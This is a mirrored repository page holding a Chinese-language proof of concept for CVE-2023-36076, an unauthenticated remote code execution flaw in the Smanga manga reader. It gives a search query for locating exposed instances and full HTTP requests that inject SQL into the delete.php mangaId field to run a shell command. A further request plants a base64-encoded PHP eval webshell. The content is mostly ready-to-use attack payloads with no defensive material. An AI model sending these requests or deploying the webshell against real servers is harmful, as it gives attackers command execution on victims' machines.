admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-06 10:56:07 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/smanga/Smanga未授权远程代码执行漏洞(CVE-2023-36076).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

74 lines
3.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Smanga未授权远程代码执行漏洞(CVE-2023-36076)
# 一、漏洞简介
Smanga无需配置docker直装的漫画流媒体阅读工具。以emby plex为灵感为解决漫画阅读需求而开发的漫画阅读器。在/php/manga/delete.php接口处存在未授权远程代码执行漏洞攻击者可在目标主机执行任意命令获取服务器权限。
# 二、影响版本
+ Smanga
# 三、资产测绘
+ hunter`web.title=="smanga"`
+ 特征
![1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0.png](./img/6zH2rDbEXutDEKrx/1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0-384375.png)
# 四、漏洞复现
```java
POST /php/manga/delete.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360
mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo `whoami` > 1.txt;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true
```
![1704896774471-f0fafe1c-b1a8-4039-b32b-dcc54e0e2d59.png](./img/6zH2rDbEXutDEKrx/1704896774471-f0fafe1c-b1a8-4039-b32b-dcc54e0e2d59-384132.png)
获取命令执行结果
```java
GET /php/manga/1.txt HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
```
![1704896808454-1fdfd6bb-66bc-4487-8f91-e6b908e9efce.png](./img/6zH2rDbEXutDEKrx/1704896808454-1fdfd6bb-66bc-4487-8f91-e6b908e9efce-693600.png)
写入webshell
```java
POST /php/manga/delete.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360
mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo PD9waHAgY2xhc3MgR3c2UVBoNjYgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg4OTBhKXsgQGV2YWwoIi8qWjlZczlnSVY3MyovIi4kSDg5MGEuIi8qWjlZczlnSVY3MyovIik7IH19bmV3IEd3NlFQaDY2KCRfUkVRVUVTVFsneCddKTs/Pg== | base64 -d > 1.php;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true
```
webshell地址
```java
/php/manga/1.php
```
![1704896888984-0b313d0c-dfd8-48a8-98e3-00edde806d77.png](./img/6zH2rDbEXutDEKrx/1704896888984-0b313d0c-dfd8-48a8-98e3-00edde806d77-383079.png)
> 更新: 2024-02-29 23:55:42
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fgwxzim62xadgc33>
Reference in New Issue View Git Blame Copy Permalink